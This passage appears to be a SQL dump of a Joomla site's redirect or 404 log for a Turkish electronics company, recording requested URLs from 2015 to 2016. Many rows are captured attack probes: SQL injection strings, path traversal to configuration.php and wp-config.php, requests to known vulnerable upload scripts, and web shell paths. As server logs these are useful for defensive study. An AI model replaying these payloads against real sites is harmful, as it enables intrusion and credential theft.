00:00:00',301),(7879,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//inc/upload.php','','','',1,0,'2015-12-02 19:21:37','0000-00-00 00:00:00',301),(7880,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_sexycontactform/fil','','','',1,0,'2015-12-02 19:21:39','0000-00-00 00:00:00',301),(7881,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_creativecontactform','','','',1,0,'2015-12-02 19:21:42','0000-00-00 00:00:00',301),(7882,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.php?option=com_adsmanager&ta','','','',1,0,'2015-12-02 19:21:45','0000-00-00 00:00:00',301),(7883,'http://3s-technologies.com.tr/index.php?view=videos&type=member&user_id=-66+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+where+table_name=0x4348415241435445525f','','http://3s-technologies.com.tr/index.php?view=videos&type=member&user_id=-66+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,1','',1,0,'2015-12-03 14:19:25','0000-00-00 00:00:00',301),(7884,'http://3s-technologies.com.tr/index.php?option=com_rsgallery2&page=inline&id=421&catid=-12+union+select+1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453+--&limitstart=1','','http://3s-technologies.com.tr/index.php?option=com_rsgallery2&page=inline&id=421&catid=-12+union+select+1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,1','',1,0,'2015-12-03 19:36:39','0000-00-00 00:00:00',301),(7885,'http://3s-technologies.com.tr/index.php?option=com_idoblog&task=profile&userblog&userid=63+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--','','http://3s-technologies.com.tr/index.php?option=com_idoblog&task=profile&userblog&userid=63+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,1','',4,0,'2015-12-03 23:39:04','0000-00-00 00:00:00',301),(7886,'http://3s-technologies.com.tr/index.php/en/language/en-GB/en-GB.xml','','','',2,0,'2015-12-04 03:29:00','0000-00-00 00:00:00',301),(7887,'http://3s-technologies.com.tr/index.php?option=com_jdownloads&view=upload','','','',1,0,'2015-12-04 09:52:47','0000-00-00 00:00:00',301),(7888,'http://3s-technologies.com.tr/index.php?option=com_easybook&itemid=1&func=deleteentry&md=aa7bf14b4c89a884b633e825099e61c4&gbid=-1+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+where+','','http://3s-technologies.com.tr/index.php?option=com_easybook&itemid=1&func=deleteentry&md=aa7bf14b4c89a884b633e825099e61c4&gbid=-1+union+select+1,2,con','',1,0,'2015-12-05 11:14:32','0000-00-00 00:00:00',301),(7889,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h','','','',1,0,'2015-12-07 00:34:45','0000-00-00 00:00:00',301),(7890,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f','','','',1,0,'2015-12-07 01:07:24','0000-00-00 00:00:00',301),(7891,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123','','','',3,0,'2015-12-08 07:11:48','0000-00-00 00:00:00',301),(7892,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/wp-admin/admin-ajax.php','','','',3,0,'2015-12-12 19:38:47','0000-00-00 00:00:00',301),(7893,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/wp-content/plugins/revslider/temp/update_extract/revslider/arhy.php','','','',1,0,'2015-12-12 19:38:51','0000-00-00 00:00:00',301),(7894,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/wp-content/plugins/revslider/temp/update_extract/revslider/xxx.php','','','',1,0,'2015-12-12 19:38:51','0000-00-00 00:00:00',301),(7895,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/wp-content/plugins/revslider/temp/update_extract/revslider/love.php','','','',1,0,'2015-12-12 19:38:51','0000-00-00 00:00:00',301),(7896,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/wp-content/plugins/showbiz/temp/update_extract/showbiz/arhy.php','','','',1,0,'2015-12-12 19:38:52','0000-00-00 00:00:00',301),(7897,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/wp-content/plugins/showbiz/temp/update_extract/showbiz/xxx.php','','','',1,0,'2015-12-12 19:38:53','0000-00-00 00:00:00',301),(7898,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/wp-content/plugins/showbiz/temp/update_extract/showbiz/love.php','','','',1,0,'2015-12-12 19:38:53','0000-00-00 00:00:00',301),(7899,'http://3s-technologies.com.tr/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(ExtractValue(1,(select concat_ws(0x3a,user(),version(),database()))))','','','',2,0,'2015-12-25 04:02:35','0000-00-00 00:00:00',301),(7900,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/images/stories/petx.php?baca','','','',1,0,'2015-12-29 09:51:10','0000-00-00 00:00:00',301),(7901,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/images/stories/explore.php?baca','','','',1,0,'2015-12-29 09:51:14','0000-00-00 00:00:00',301),(7902,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/images/stories/magic.php.png','','','',1,0,'2015-12-29 09:51:34','0000-00-00 00:00:00',301),(7903,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/images/stories/magic.php.png?baca','','','',1,0,'2015-12-29 09:51:35','0000-00-00 00:00:00',301),(7904,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',1,0,'2015-12-29 09:53:17','0000-00-00 00:00:00',301),(7905,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2015-12-29 09:53:21','0000-00-00 00:00:00',301),(7906,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2015-12-29 09:53:23','0000-00-00 00:00:00',301),(7907,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-29 09:53:25','0000-00-00 00:00:00',301),(7908,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-29 09:53:27','0000-00-00 00:00:00',301),(7909,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-29 09:53:29','0000-00-00 00:00:00',301),(7910,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-29 09:53:31','0000-00-00 00:00:00',301),(7911,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-29 09:53:33','0000-00-00 00:00:00',301),(7912,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-29 09:53:35','0000-00-00 00:00:00',301),(7913,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',1,0,'2015-12-29 09:53:37','0000-00-00 00:00:00',301),(7914,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',1,0,'2015-12-29 09:53:39','0000-00-00 00:00:00',301),(7915,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2015-12-29 09:53:41','0000-00-00 00:00:00',301),(7916,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-1/inc/upload.php','','','',1,0,'2015-12-29 09:53:43','0000-00-00 00:00:00',301),(7917,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-2/inc/upload.php','','','',1,0,'2015-12-29 09:53:43','0000-00-00 00:00:00',301),(7918,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-3/inc/upload.php','','','',1,0,'2015-12-29 09:53:44','0000-00-00 00:00:00',301),(7919,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-4/inc/upload.php','','','',1,0,'2015-12-29 09:53:46','0000-00-00 00:00:00',301),(7920,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/components/com_sexycontactform/fileupload/index.php','','','',1,0,'2015-12-29 09:53:48','0000-00-00 00:00:00',301),(7921,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-5/inc/upload.php','','','',1,0,'2015-12-29 09:53:50','0000-00-00 00:00:00',301),(7922,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2015-12-29 09:53:50','0000-00-00 00:00:00',301),(7923,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2015-12-29 09:53:50','0000-00-00 00:00:00',301),(7924,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-6/inc/upload.php','','','',1,0,'2015-12-29 09:53:51','0000-00-00 00:00:00',301),(7925,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1','','','',1,0,'2015-12-29 09:53:51','0000-00-00 00:00:00',301),(7926,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-7/inc/upload.php','','','',1,0,'2015-12-29 09:53:52','0000-00-00 00:00:00',301),(7927,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-8/inc/upload.php','','','',1,0,'2015-12-29 09:53:52','0000-00-00 00:00:00',301),(7928,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-9/inc/upload.php','','','',1,0,'2015-12-29 09:53:53','0000-00-00 00:00:00',301),(7929,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2015-12-29 09:53:53','0000-00-00 00:00:00',301),(7930,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-10/inc/upload.php','','','',1,0,'2015-12-29 09:53:53','0000-00-00 00:00:00',301),(7931,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-11/inc/upload.php','','','',1,0,'2015-12-29 09:53:54','0000-00-00 00:00:00',301),(7932,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-12/inc/upload.php','','','',1,0,'2015-12-29 09:53:55','0000-00-00 00:00:00',301),(7933,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-13/inc/upload.php','','','',1,0,'2015-12-29 09:53:56','0000-00-00 00:00:00',301),(7934,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-14/inc/upload.php','','','',1,0,'2015-12-29 09:53:56','0000-00-00 00:00:00',301),(7935,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-15/inc/upload.php','','','',1,0,'2015-12-29 09:53:57','0000-00-00 00:00:00',301),(7936,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-16/inc/upload.php','','','',1,0,'2015-12-29 09:53:57','0000-00-00 00:00:00',301),(7937,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-17/inc/upload.php','','','',1,0,'2015-12-29 09:53:58','0000-00-00 00:00:00',301),(7938,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-18/inc/upload.php','','','',1,0,'2015-12-29 09:53:58','0000-00-00 00:00:00',301),(7939,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-19/inc/upload.php','','','',1,0,'2015-12-29 09:53:59','0000-00-00 00:00:00',301),(7940,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates//cfg-contactform-20/inc/upload.php','','','',1,0,'2015-12-29 09:53:59','0000-00-00 00:00:00',301),(7941,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/images/stories/petx.php?baca','','','',1,0,'2015-12-29 12:32:15','0000-00-00 00:00:00',301),(7942,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/images/stories/explore.php?baca','','','',1,0,'2015-12-29 12:32:19','0000-00-00 00:00:00',301),(7943,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/images/stories/magic.php.png','','','',1,0,'2015-12-29 12:32:45','0000-00-00 00:00:00',301),(7944,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/images/stories/magic.php.png?baca','','','',1,0,'2015-12-29 12:32:45','0000-00-00 00:00:00',301),(7945,'http://www.3s-technologies.com.tr/index.php/en/products&amp;sa=U&amp;ved=0ahUKEwj6seel8pLKAhWCvxoKHZNSByk4yAEQFghPMA4&amp;usg=AFQjCNFdnRLg9X2ciDil2lSFauygZpoQhw/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','','',2,0,'2016-01-05 14:39:47','0000-00-00 00:00:00',301),(7946,'http://www.3s-technologies.com.tr/index.php/en/products&amp;sa=U&amp;ved=0ahUKEwj6seel8pLKAhWCvxoKHZNSByk4yAEQFghPMA4&amp;usg=AFQjCNFdnRLg9X2ciDil2lSFauygZpoQhw/wp-admin/admin-ajax.php','','','',2,0,'2016-01-05 14:39:52','0000-00-00 00:00:00',301),(7947,'http://www.3s-technologies.com.tr/index.php/en/wp-admin/admin-ajax.php','','','',2,0,'2016-01-05 14:39:56','0000-00-00 00:00:00',301),(7948,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-f','','','',1,0,'2016-01-07 22:31:42','0000-00-00 00:00:00',301),(7949,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h','','','',1,0,'2016-01-07 23:01:29','0000-00-00 00:00:00',301),(7950,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/p','','','',1,0,'2016-01-11 00:29:49','0000-00-00 00:00:00',301),(7951,'http://www.3s-technologies.com.tr///index.php?option=com_adsmanager&task=upload&tmpl=component','','','',39,0,'2016-01-11 14:08:42','0000-00-00 00:00:00',301),(7952,'http://3s-technologies.com.tr/index.php?option=com_jdownloads','','','',1,0,'2016-01-16 03:35:15','0000-00-00 00:00:00',301),(7953,'http://www.3s-technologies.com.tr/?type_id=&option=com_contenthistory&item_id=&view=history&list[select]=polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,0x6d616b6d616e,version(),user())as+mk)``)``)','','','',1,0,'2016-01-18 21:13:01','0000-00-00 00:00:00',301),(7954,'http://www.3s-technologies.com.tr/index.php?Itemid=243&sa=U&ved=0ahUKEwiElKDZ4r3KAhUChw8KHSdqCCs4ZBAWCIsCMDU&usg=AFQjCNHajAAjnXpjCsEIKERudIZiU2olnA/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',2,0,'2016-01-22 15:51:02','0000-00-00 00:00:00',301),(7955,'http://www.3s-technologies.com.tr/index.php?Itemid=243&sa=U&ved=0ahUKEwiElKDZ4r3KAhUChw8KHSdqCCs4ZBAWCIsCMDU&usg=AFQjCNHajAAjnXpjCsEIKERudIZiU2olnA/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe','','','',1,0,'2016-01-22 15:51:02','0000-00-00 00:00:00',301),(7956,'http://www.3s-technologies.com.tr/index.php?Itemid=243&sa=U&ved=0ahUKEwiElKDZ4r3KAhUChw8KHSdqCCs4ZBAWCIsCMDU&usg=AFQjCNHajAAjnXpjCsEIKERudIZiU2olnA/tmp/roin.php?db','','','',1,0,'2016-01-22 15:51:18','0000-00-00 00:00:00',301),(7957,'http://www.3s-technologies.com.tr/index.php?Itemid=243&sa=U&ved=0ahUKEwiElKDZ4r3KAhUChw8KHSdqCCs4ZBAWCIsCMDU&usg=AFQjCNHajAAjnXpjCsEIKERudIZiU2olnA/tmp/recky.php','','','',1,0,'2016-01-22 15:51:19','0000-00-00 00:00:00',301),(7958,'http://www.3s-technologies.com.tr/index.php?Itemid=243&sa=U&ved=0ahUKEwiElKDZ4r3KAhUChw8KHSdqCCs4ZBAWCIsCMDU&usg=AFQjCNHajAAjnXpjCsEIKERudIZiU2olnA/tmp/metri.php','','','',2,0,'2016-01-22 15:51:20','0000-00-00 00:00:00',301),(7959,'https://www.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2016-01-24 06:27:42','0000-00-00 00:00:00',301),(7960,'https://www.3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',2,0,'2016-01-24 07:02:50','0000-00-00 00:00:00',301),(7961,'http://3s-technologies.com.tr/index.php?option=com_user&view=login','','http://3s-technologies.com.tr/index.php?option=com_user&view=login','',3,0,'2016-01-30 11:06:07','0000-00-00 00:00:00',301),(7962,'http://3s-technologies.com.tr/index.php?option=com_user&view=user&task=edit','','http://3s-technologies.com.tr','',1,0,'2016-01-30 11:06:32','0000-00-00 00:00:00',301),(7963,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/modules/user-modules/login\'','','','',1,0,'2016-01-30 16:26:24','0000-00-00 00:00:00',301),(7964,'http://3s-technologies.com.tr//index.php?option=com_jdownloads&Itemid=1&view=upload','','','',3,0,'2016-01-30 16:51:16','0000-00-00 00:00:00',301),(7965,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/35-professionals&amp;sa=U&amp;ved=0ahUKEwjFv4rjiOHKAhUKH5QKHULwBko4yAEQFggjMAQ&amp;usg=AFQjCNGrETn3u__u-vYItPL8ZGbi0qLLzg/wp-admin/ad','','','',1,0,'2016-02-05 16:44:00','0000-00-00 00:00:00',301),(7966,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','','',2,0,'2016-02-05 16:44:04','0000-00-00 00:00:00',301),(7967,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/wp-admin/admin-ajax.php','','','',2,0,'2016-02-05 16:44:05','0000-00-00 00:00:00',301),(7968,'https://www.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2016-02-07 10:52:18','0000-00-00 00:00:00',301),(7969,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/productr/smd-ultra-hız/mx200lp-3-detail','','','',20,0,'2016-02-12 18:08:56','0000-00-00 00:00:00',301),(7970,'http://3s-technologies.com.tr/index.php?option=anyrandomurl2636','','http://3s-technologies.com.tr/index.php?option=anyrandomurl2636','',2,0,'2016-02-13 19:14:30','0000-00-00 00:00:00',301),(7971,'http://3s-technologies.com.tr/index.php/en/?option=com_user&view=login','','http://3s-technologies.com.tr/index.php/en/?option=com_user&view=login','',2,0,'2016-02-13 19:14:36','0000-00-00 00:00:00',301),(7972,'http://3s-technologies.com.tr/index.php/en/?option=anyrandomurl2636','','http://3s-technologies.com.tr/index.php/en/?option=anyrandomurl2636','',2,0,'2016-02-13 19:14:36','0000-00-00 00:00:00',301),(7973,'http://3s-technologies.com.tr/index.php?option=com_agora','','http://3s-technologies.com.tr/index.php?option=com_agora','',1,0,'2016-02-15 03:24:40','0000-00-00 00:00:00',301),(7974,'http://3s-technologies.com.tr/index.php?option=com_ccboard&view=forumlist','','http://3s-technologies.com.tr/index.php?option=com_ccboard&view=forumlist','',1,0,'2016-02-15 03:24:40','0000-00-00 00:00:00',301),(7975,'http://3s-technologies.com.tr/index.php?option=com_easyblog&view=latest','','http://3s-technologies.com.tr/index.php?option=com_easyblog&view=latest','',1,0,'2016-02-15 03:24:41','0000-00-00 00:00:00',301),(7976,'http://3s-technologies.com.tr/index.php?option=com_k2&view=itemlist&task=date','','http://3s-technologies.com.tr/index.php?option=com_k2&view=itemlist&task=date','',1,0,'2016-02-15 03:24:42','0000-00-00 00:00:00',301),(7977,'http://3s-technologies.com.tr/index.php?option=com_kunena&view=category&layout=list','','http://3s-technologies.com.tr/index.php?option=com_kunena&view=category&layout=list','',1,0,'2016-02-15 03:24:42','0000-00-00 00:00:00',301),(7978,'http://3s-technologies.com.tr/index.php?option=com_community&view=frontpage','','http://3s-technologies.com.tr/index.php?option=com_community&view=frontpage','',1,0,'2016-02-15 03:24:42','0000-00-00 00:00:00',301),(7979,'http://3s-technologies.com.tr/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1','','http://3s-technologies.com.tr/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1','',1,0,'2016-02-15 03:24:42','0000-00-00 00:00:00',301),(7980,'http://3s-technologies.com.tr/index.php?option=com_vitabook&view=vitabook','','http://3s-technologies.com.tr/index.php?option=com_vitabook&view=vitabook','',1,0,'2016-02-15 03:24:42','0000-00-00 00:00:00',301),(7981,'http://3s-technologies.com.tr/index.php/en/?option=com_agora','','http://3s-technologies.com.tr/index.php/en/?option=com_agora','',1,0,'2016-02-15 03:24:48','0000-00-00 00:00:00',301),(7982,'http://3s-technologies.com.tr/index.php/en/?option=com_easyblog&view=latest','','http://3s-technologies.com.tr/index.php/en/?option=com_easyblog&view=latest','',1,0,'2016-02-15 03:24:48','0000-00-00 00:00:00',301),(7983,'http://3s-technologies.com.tr/index.php/en/?option=com_ccboard&view=forumlist','','http://3s-technologies.com.tr/index.php/en/?option=com_ccboard&view=forumlist','',1,0,'2016-02-15 03:24:48','0000-00-00 00:00:00',301),(7984,'http://3s-technologies.com.tr/index.php/en/?option=com_k2&view=itemlist&task=date','','http://3s-technologies.com.tr/index.php/en/?option=com_k2&view=itemlist&task=date','',1,0,'2016-02-15 03:24:50','0000-00-00 00:00:00',301),(7985,'http://3s-technologies.com.tr/index.php/en/?option=com_community&view=frontpage','','http://3s-technologies.com.tr/index.php/en/?option=com_community&view=frontpage','',1,0,'2016-02-15 03:24:50','0000-00-00 00:00:00',301),(7986,'http://3s-technologies.com.tr/index.php/en/?option=com_phocaguestbook&view=phocaguestbook&id=1','','http://3s-technologies.com.tr/index.php/en/?option=com_phocaguestbook&view=phocaguestbook&id=1','',1,0,'2016-02-15 03:24:55','0000-00-00 00:00:00',301),(7987,'http://3s-technologies.com.tr/index.php/en/?option=com_kunena&view=category&layout=list','','http://3s-technologies.com.tr/index.php/en/?option=com_kunena&view=category&layout=list','',1,0,'2016-02-15 03:24:55','0000-00-00 00:00:00',301),(7988,'http://3s-technologies.com.tr/index.php/en/?option=com_vitabook&view=vitabook','','http://3s-technologies.com.tr/index.php/en/?option=com_vitabook&view=vitabook','',1,0,'2016-02-15 03:24:55','0000-00-00 00:00:00',301),(7989,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2016-02-15 05:29:06','0000-00-00 00:00:00',301),(7990,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2016-02-15 05:29:14','0000-00-00 00:00:00',301),(7991,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',1,0,'2016-02-15 07:29:04','0000-00-00 00:00:00',301),(7992,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2016-02-15 07:29:07','0000-00-00 00:00:00',301),(7993,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2016-02-15 07:29:09','0000-00-00 00:00:00',301),(7994,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-15 07:29:11','0000-00-00 00:00:00',301),(7995,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-15 07:29:13','0000-00-00 00:00:00',301),(7996,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-15 07:29:15','0000-00-00 00:00:00',301),(7997,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-15 07:29:17','0000-00-00 00:00:00',301),(7998,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',1,0,'2016-02-15 07:29:24','0000-00-00 00:00:00',301),(7999,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-15 07:29:24','0000-00-00 00:00:00',301),(8000,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',1,0,'2016-02-15 07:29:26','0000-00-00 00:00:00',301),(8001,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-15 07:29:27','0000-00-00 00:00:00',301),(8002,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2016-02-15 07:29:28','0000-00-00 00:00:00',301),(8003,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-1/inc/upload.php','','','',1,0,'2016-02-15 07:29:32','0000-00-00 00:00:00',301),(8004,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/components/com_sexycontactform/fileupload/index.php','','','',1,0,'2016-02-15 07:29:32','0000-00-00 00:00:00',301),(8005,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-2/inc/upload.php','','','',1,0,'2016-02-15 07:29:33','0000-00-00 00:00:00',301),(8006,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-3/inc/upload.php','','','',1,0,'2016-02-15 07:29:36','0000-00-00 00:00:00',301),(8007,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2016-02-15 07:29:36','0000-00-00 